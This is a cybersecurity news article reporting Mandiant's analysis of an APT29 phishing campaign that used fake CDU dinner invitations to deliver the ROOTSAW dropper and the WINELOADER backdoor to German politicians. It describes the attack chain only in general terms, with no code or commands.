Share this article on:
Hackers linked to Russia’s Foreign Intelligence Service have been observed deploying phishing techniques to snare German politicians.
Researchers of the Google-owned Mandiant security firm have outlined the details of a Russian hacking campaign targeting political parties in Germany.
Mandiant believes the group is APT29, a threat actor with ties to Russia’s Foreign Intelligence Service.
APT29 has historically gone after ruling governments and diplomats, according to Mandiant, targeting political parties is a new twist to the threat actor’s techniques, tactics, and procedures.
This new campaign also marks the first time APT29 has been observed using phishing lures written in German – in this case, email invites to a dinner reception. The invites feature the logo of the German Christian Democratic Union (CDU) political party. The invite sends victims to a compromised WordPress website, where the threat actor’s first stage payload – dubbed ROOTSAW – is initiated.
This is a second document, again looking like legitimate material from the CDU, which is shared with the victim. This document, invariably named as some form of invite, hides a JS obfuscated payload that, when run, downloads the final payload, a backdoor malware that Mandiant is calling WINELOADER.
This backdoor can communicate with APT29’s C2 infrastructure and share details of the infected machine, revealing whether the system is a valid target for further action. WINELOADER itself contains some similar code and techniques to prior APT29 malware, with some unique additions.
And while German parties seem to be the main target, Mandiant feels that is likely to change.
“Based on the SVR’s responsibility to collect political intelligence and this APT29 cluster’s historical targeting patterns,” Mandiant said in a blog post, “we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum.”
APT29, also known as Cozy Bear, Midnight Blizzard, and a raft of other names, was first observed by Russian security firm Kaspersky Lab, no less in 2008. Since then, the group has been responsible for hacks against the Pentagon in 2015 and the Democratic National Committee in 2016.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.